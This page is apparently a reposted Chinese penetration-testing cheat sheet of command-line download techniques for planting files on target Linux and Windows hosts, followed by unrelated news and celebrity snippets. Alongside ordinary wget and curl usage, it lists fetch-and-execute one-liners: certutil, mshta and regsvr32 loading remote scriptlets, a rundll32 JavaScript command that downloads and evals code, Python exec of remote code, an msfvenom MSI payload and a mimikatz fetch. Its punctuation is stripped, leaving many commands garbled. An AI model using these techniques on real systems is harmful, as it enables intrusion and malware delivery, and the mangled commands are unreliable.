游戏电视苹果数码历史美丽
投稿投诉
美丽时装
彩妆资讯
历史明星
乐活安卓
数码常识
驾车健康
苹果问答
网络发型
电视车载
室内电影
游戏科学
音乐整形

命令行终端下载指令大全(winlinux)

  1。简介
  在我们渗透测试的过程中,通常会需要向目标主机传送一些文件,来达到提权,维持控制等目的。因此当不方便进行直接传输时,同时目标主机是能有网络连接的,那么此时就可以通过本地下载这种方法来达到文件传输的目的。此篇文章,我会对互联网上针对win与linux大部分的下载指令来做一个汇总,可能会有疏漏,但汇总的都是经常会用的。
  2。Linux2。1Wget
  这款工具功能很丰富,可以充当某种功能完备的GUI下载管理器,它拥有一款理想的下载管理器所需要的所有功能,比如它可以恢复下载,可以下载多个文件,出现某个连接问题后,可以重新尝试下载,你甚至可以管理最大的下载带宽。
  直接下载:wgethttp:www。samplevideos。comvideomp4big。mp4
  后台下载:wgetbhttp:www。samplevideos。comvideomp4big。mp4
  如果互联网连接出现中断,恢复下载:wgetchttp:www。samplevideos。comvideomp4big。mp4
  从某个密码保护的ftp软件库下载文件:wgetftpuserusernameftppasswordGivepasswordDownloadurladdress
  2。2Curl
  Curl是另一种高效的下载工具,它可以用来上传或下载文件,只要使用一个简单的命令。它支持暂停和恢复下载程序包,并支持数量最多的Web协议,可预测下载完成还剩余多少时间,可通过进度条来显示下载进度。它是所有Linux发行版的内置工具。
  直接下载:curloum。mp4http:www。samplevideos。comvideomp4big。mp4
  借助o选项,提供名称,下载文件会以该名称保存;如使用O选项,文件就会以原始名称保存。
  2。3Axel
  这是wget的出色替代者,是一款轻量级下载实用工具。它实际上是个加速器,因为它打开了多路http连接,可下载独立文件片段,因而文件下载起来更快速。aptgetinstallaxel
  直接下载:axelhttp:www。samplevideos。comvideomp4big。mp4
  2。4Aria2
  这是一种开源命令行下载加速器,支持多个端口,你可以使用最大带宽来下载文件,是一款易于安装、易于使用的工具。aptgetinstallaria2
  直接下载:aria2chttp:www。samplevideos。comvideomp4big。mp4
  2。5Perl
  Perl是一门很吊的语言,使用它基本可以实现任何事情,用它实现文件下载也很简单。!perl
  !usrbinperl
  useLWP::Simple;
  getstore(http:domainfile,file);
  执行脚本文件是这样:perlteststrongtoutiaooriginspanclasshighlighttext。plstrong
  2。6Python
  Python也是很受欢迎的主流脚本语言,代码清晰且简洁:!python
  !usrbinpython
  importurllib2
  uurllib2。urlopen(http:domainfile)
  localFileopen(localfile,w)
  localFile。write(u。read)
  localFile。close
  2。7Ruby
  Ruby是一个面对对象的语言,Metasploit框架就是用它来实现的,当然他也可以实现像下载文件这样的小任务。!ruby
  !usrbinruby
  requirenethttp
  Net::HTTP。start(www。domain。com){http
  rhttp。get(file)
  open(savelocation,wb){file
  file。write(r。body)
  }
  }
  执行脚本文件是这样;rubyteststrongtoutiaooriginspanclasshighlighttext。rbstrong
  2。8PHP
  PHP作为一种服务端脚本,也可以实现下载文件这种功能。!usrbinphp
  lt;?php
  datafile(http:example。comfile);
  lflocalfile;
  fhfopen(lf,w);
  fwrite(fh,data〔0〕);
  fclose(fh);
  ?
  执行脚本文件是这样:phpteststrongtoutiaooriginspanclasshighlighttext。phpstrong
  2。9FTP
  一般情况下攻击者使用FTP上传文件需要很多交互的步骤,下面这个bash脚本,考虑到了交互的情况,可以直接执行并不会产生交互动作。ftp127。0。0。1
  username
  password
  getfile
  exit
  当然根据实际情况也可以进入交互终端:ftp192。168。3。2
  输入用户名和密码后
  lcdE:file进入E盘下的file目录
  cdwww进入服务器上的www目录
  getaccess。log将服务器上的access。log下载到E:file
  2。10Netcat
  攻击者的电脑上输入:catfilencl1234
  这个命令会将file的内容输出到本地的1234端口中,然后不论谁连接此端口,file的内容将会发送到连接过来的IP。
  目标电脑上的命令:nchostip1234file
  这条命令将连接攻击者的电脑,接受file内容保存。
  3。Windows3。1Powershell
  PowerShell是一种winodws原生的脚本语言,对于熟练使用它的人来说,可以实现很多复杂的功能。
  下面这两条指令实现了从Internet网络下载一个文件。pNewObjectSystem。Net。WebClient
  p。DownloadFile(http:domainfileC:homepathfile)
  3。2IPCcopy192。168。3。1cest。exeE:file
  cmd。exekwebdavserverfolderbatchfile。txt
  3。3Certutil
  可以应用到:WindowsServer2003,WindowsServer2003R2,WindowsServer2003withSP1,WindowsServer2003withSP2certutilurlcachesplitfhttp:192。168。3。1test。exefile。exe
  certutilurlcachesplitfhttp:192。168。3。1test。exedelete删除缓存
  certutilverifyctlsplitfsplithttp:192。168。3。1test。exe
  此条命令,会将原文件下载成为临时bin文件,把名字改回来一样可以正常运行
  文件下载并执行如下:certutilurlcachesplitfhttp:site。comaa。exea。exedela。execertutilurlcachesplitfhttp:192。168。254。102:80adelete
  3。4VisualBasic
  在1998年VisualBasic最终标准在windows上确定。下面的代码可以实现下载文件,虽然它的长度比Powershell长多了。SetargsWscript。Arguments
  Urlhttp:domainfile
  dimxHttp:SetxHttpcreateobject(Microsoft。XMLHTTP)
  dimbStrm:SetbStrmcreateobject(Adodb。Stream)
  xHttp。OpenGET,Url,False
  xHttp。Send
  withbStrm
  。type1
  。open
  。writexHttp。responseBody
  。savetofileC:homepathfile,2
  endwith
  在windows中Cscript指令可以允许你执行VBS脚本文件或者对script脚本做一些设置。在windows7中这个指令并不是必须要用到。但是在windowsXP中需要使用这条指令,如下所示:cscriptteststrongtoutiaooriginspanclasshighlighttext。vbsstrong
  3。5Tftp
  在WindowsVista以及以后的版本中默认有FTP,可以使用以下命令运行:
  上传:tftpiIP地址PUTC:homepathfile远程存放位置
  下载:tftpiIP地址GETC:homepathfile本地存放位置
  3。6Bitsadmin
  Bitsadmin是Windows命令行工具,用户可以使用它来创建下载或上传的任务。只能命令下载到指定路径上,win7以上:bitsadmintransfermyDownLoadJobdownloadprioritynormalhttp:192。168。203。140b。ps1E:phpstudyproWWWb。ps1
  bitsadminrawreturntransfergetfilehttp:192。168。3。1test。txtE:fileest。txt
  bitsadminrawreturntransfergetpayloadhttp:192。168。3。1test。txtE:fileest。txt
  3。7msiexecmsiexecqihttp:192。168。3。1calc。png
  calc。png:
  msfvenomfmsipwindowsexecCMDcalc。execacl。png
  3。8IEExecstrongtoutiaooriginspanclasshighlighttextC:WindowsMicrosoft。NETFrameworkv2。0。50727caspolsoffstrong
  strongtoutiaooriginspanclasshighlighttextC:WindowsMicrosoft。NETFrameworkv2。0。50727IEExechttp:192。168。3。1test。exestrong
  3。9PythonC:python27python。execimporturllib2;execurllib2。urlopen(‘http:192。168。3。1test。zip’)。read;
  3。10Mshta
  mshtahttp:192。168。3。1run。htarun。hta内容如下:HTML
  metahttpequivContentTypecontenttexthtml;charsetutf8
  HEAD
  body
  demo
  body
  HEAD
  HTML
  mshtavbscript:Close(Execute(GetObject(script:http:webserverpayload。sct)))
  3。11Rundll32
  依赖于WScript。shell这个组件:rundll32。exejavascript:。。mshtml,RunHTMLApplication;document。write;hnew20ActiveXObject(WinHttp。WinHttpRequest。5。1);h。Open(GET,http:127。0。0。1:8081connect,false);try{h。Send;bh。ResponseText;eval(b);}catch(e){new20ActiveXObject(WScript。Shell)。Run(cmdctaskkillfimrundll32。exe,0,true);}
  3。12Regsvr32
  Regsvr32命令用于注册COM组件,是Windows系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。
  WinXP及以上系统的regsvr32。exe在windowssystem32文件夹下;2000系统的regsvr32。exe在winntsystem32文件夹下。regsvr32usi:http:192。168。3。1test。datascrobj。dll
  test。data内容:strongtoutiaooriginspanclasshighlighttextlt;?XMLversion1。0?strong
  strongtoutiaooriginspanclasshighlighttextstrong
  strongtoutiaooriginspanclasshighlighttextregistrationstrong
  strongtoutiaooriginspanclasshighlighttextscriptletstrong
  还可以利用https:github。comCroweCybersecurityps1encode生成sct文件:regsvr32usi:http:192。168。3。1test。sctscrobj。dll
  3。13WindowsShare
  Windowsshares可以加载一个驱动器,然后用命令来复制文件。
  加载远程驱动:netusex:127。0。0。1shareuser:example。comuserIDmyPassword
  3。14格式转换
  当需要把一个exe文件放到目标计算机上时,Nishang可以使用PowerShell允许你把一个exe转换成hex,然后把hex再转换成原来的exe文件:
  把exe转成hex文件输入:PS。ExetoText。ps1evil。exeevil。txt
  打开evil。txt文件,复制内容,然后通过RDP的剪贴板复制进目标计算机,把hex文件还原成exe文件输入:PS。TexttoExe。ps1evil。textevil。exe
  3。15其它
  1。MSXSL。EXE
  msxsl。exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令。
  2。pubprn。vbs在Windows7以上版本存在一个名为PubPrn。vbs的微软已签名WSH脚本,其位于strongtoutiaooriginspanclasshighlighttextC:WindowsSystem32PrintingAdminScriptsenUSstrong
  3。esentutl。exeextrac32。exeesentutl。exey172。16。249。149sharemimikatztrunk。zipdC:UsersPublicmimikatztrunk。zip0
  extrac32。exeYC172。16。249。149shareest。txtC:UsersPublicest。txt
  4。desktopimgdownldr。exedesktopimgdownldr。exe位于Win10的system32文件夹中,原本用于设置锁定屏幕或桌面背景图像的。
  普通用户可以用:setSYSTEMROOTC:ProgramDatacmdcdesktopimgdownldr。exelockscreenurl:http:urlxxx。exeeventName:desktopimgdownldr
  这样来下载文件。
  可以把C:ProgramData来改成一个普通用户可写的目录。
  下载的文件存放于:C:ProgramDataPersonalizationLockScreenImagexrandom。exe。
  管理员用户会多写一个注册表项,所以管理员最好的命令是:setSYSTEMROOTC:ProgramDatacmdcdesktopimgdownldr。exelockscreenurl:https:urlfile。exeeventName:desktopimgdownldrregdeleteHKEYLOCALMACHINESOFTWAREMicrosoftWindowsCurrentVersionPersonalizationCSPf
  4。参考链接
  https:xz。aliyun。comt1654
  https:www。t00ls。netarticles49501。html
  https:evi1cg。mearchivesremoteexec。html
  https:www。unixmen。comtop10commandlinetoolsdownloadinglinux
  作者:肖洋肖恩、
  原文链接:https:www。cnblogs。commop12109717。html

平采娜在泰国红吗,平采娜在泰国算几线明星随着电视剧《吹落的树叶》的热播,还有之前的电视剧《初恋这件小事》让平采娜在国内也算是比较火的明星了,很多网友都好奇平采娜在泰国到底算几线明星?今天我们就来一起详细的了解一下。……为什么那么多热门App抢着借钱给你?新华社上海4月28日电题:为什么那么多热门App抢着借钱给你?新华社记者何欣荣、杨有宗开通借款功能,就送VIP会员;点张优惠券,就会跳转到授信贷款页面很多人发现,当……三石车见解九号发布会重新认识电动两轮2022年4月28日晚7:00,九号的新发布会在线上开幕了。发布会的时间非常短,内容干货满满发出后就进入到聊天室的多人聊天环节了。但是这个发布会所阐述的内容,还是明显看出九号与……张子枫的爸爸妈妈是谁,张子枫的家境怎么样揭秘张子枫是大家非常喜欢的一位小演员,小小年纪的她刚刚出道时就特别引人注目,后来在众多影视剧当中所饰演的角色也令人印象深刻,现在的张子枫绝对是娱乐圈当中比较火的一位演员了,大家想知……龚晓京父亲简历什么背景被传说那么厉害龚晓京是刘强东的前女友,据说是帮助刘强东创业成功的最关键一步,名字都是两个人的结合,这样的一个方式是感动了很多人,只是不能够让人出现在更多的一个步骤中,没有什么完美的结局,只是……1962年活鲛人图片现实总是把幻想的美好还原的面目前非1962年活鲛人图片说的是有人在海边发现了人鱼一体的骨骸,有人利用电脑技术还原了这种升温的外貌特征,结果就是中国内地经常被提及的鲛人。同年还有其他国家的军人在海边发现了一个能够……微笑狗五秒动态原图胆小者慎入好奇害死猫最近网上流传了一些很奇怪的图片。而且还引起了不少人的关注。但其实这些图片都是网友们故意搞怪P出来的照片。比如之前很多人都知道的空手指、蓬蓬乳之类的。通过一些简单的图片。把他们P……蔚来宁王入局之后,吉利联手力帆进军万亿换电赛道来源:中证报1月24日,吉利汽车发布公告称,与力帆科技(维权)订立协议成立的合资公司已完成工商注册登记手续,取得重庆两江新区市场监督管理局颁发的营业执照。合资企业名为重庆……java程序员一直在做增删改查很迷茫,该如何提升自己?编程语言说到底就是一种工具,至于能让编程语言发挥出什么样的价值,要结合编程的场景,以及具体的任务要求。研发人员往往会采用编程语言来完成系统级任务,而应用级程序员往往会使用……张雨绮的素颜照有自信才有这个勇气吧都说天下没有丑女人只有懒女人。而在如今这个拥有强大P图功能,以及美颜的天下。哪里还有丑女人。在屏幕上大家看到的女人一个比一个漂亮。简直让人相信了是不是人类基因突变。都生的如此貌……乐嘉醉酒事件视频始末喝了两瓶白酒嘴里直说tmd乐嘉如今已经的没有了曾经的那么火的感觉了,之前在看非诚勿扰的时候,其实很多的人还是非常的喜欢乐嘉的,因为乐嘉给人的感觉总是特别的犀利和睿智的,但是时间一久似乎就看透了乐嘉真正的……5G手机出来了4G手机还能用吗,会受什么影响?能用!极客谈科技,全新视角、全新思路,伴你遨游神奇的科技世界。这个问题需要从两个方面来考虑:一个是现有的4G手机能否平滑的过度,继续使用5G网络;一个是……
萧敬腾雨神人设不倒!但商标被抢了?昨天武汉暴雨上了热搜榜。原本夏天下暴雨没什么大惊小怪,但有网友发现,被称为雨神的萧敬腾疑似在武汉开演唱会,这下网友就不奇怪武汉为什么下暴雨了。但暴雨那天其实萧敬腾不在武汉……携手中汽协,团车在沪发布新战略强化品销合一2021年4月20日,主题为以场景推动变革的团车新战略发布会在上海举行。会上,团车与中国汽车工业协会共同宣布达成战略合作,双方将以拉动内循环、助力汽车市场蓬勃发展为目标,以领先……李瑾南营销团队改变打法,奕炫MAX能否一炮打响?引言:持续预热一段时期之后,东风风神今年最重磅的轿车新品奕炫MAX,日前迎来下线和预售,新车将推出三款车型,预售价区间为9。7911。59万元。月初,时值我D百年大庆,华……海信家电三季报营收突破500亿同比增长43。610月28日晚间,海信家电(000921。SZ00921。HK)公布2021年三季报:公司前三季度实现营业收入500。67亿元,同比增长43。60,其中第三季度营收176。43……迟到的父亲节礼物,AOCAIO721晒单前言今年父亲节是6月16日和618就差两天时间,索性就等到618再送了。去年送的是SWISSE护肝片,老爸说蛮不错的,今年打算把家里的电脑换了吧,毕竟从我毕业到现在,已经……张勇的哪吒汽车三步曲,2025年销50万辆可还行?引言对于哪吒汽车当前的阶段性胜利和整体处境,张勇有冷静的判断和清醒认知。智能电动车赛道的晋级赛尚在进行时,张勇坚信,2025年才会是一个分水岭,现在谈输赢为时过早。跑就对了。……ampampquot意念玩游戏ampampquot将成为现实图灵周报:精选AI行业一周大事件,从良莠不齐的行业资讯中挑选出最有价值的信息,配上专业点评,值得你细读、品味。01清华发布AI2000榜单4月8日,由清华大学AMi……壹号本OneGx1Pro高达限量版发布,采用11代酷睿根据壹号本官方最新消息,壹号本OneGx1Pro高达限量版将于12月12日京东壹号本旗舰店首发预售,这款备受期待的最小搭载虎湖处理器的游戏本预计将在今年12月30日之前发货!……南卡N2S真无线蓝牙耳机续航持久,颜值爆表【前言】南卡N2S作为销量50万N2的升级款,南卡N2S采用了新一代蓝牙5。2技术,拥有150小时超长续航,游戏影音时延也更低,同时在音质方面还有所突破,这次还有令人期待……电气运行试题十四56。三相电流常用的接线方式星型和三角形57。使用万用表注意事项1。正确使用接线柱2。正确选择档位3。测量之前调零4。正确读数5。注意安全58。电流表和电压表如何介……百度CEO李彦宏提案智慧养老,工信部这样答复关于智慧养老,工信部发布《关于政协第十三届全国委员会第四次会议第3540号(社会管理类249号)提案答复的函》。工信部表示,下一步将会同卫生健康委等部门进一步推进智慧健康养老产……币圈事件萨尔瓦多公民示威游行,反对政府将比特币当作法币萨尔瓦多公民示威游行,反对政府将比特币当作法币萨尔瓦多(ElSalvador)宣布成为全球首个将比特币当作法币的国家,该国执政党认为这是一种新思想,希望比特币的大规模采用……
友情链接:易事利快生活快传网聚热点七猫云快好知快百科中准网快好找文好找中准网快软网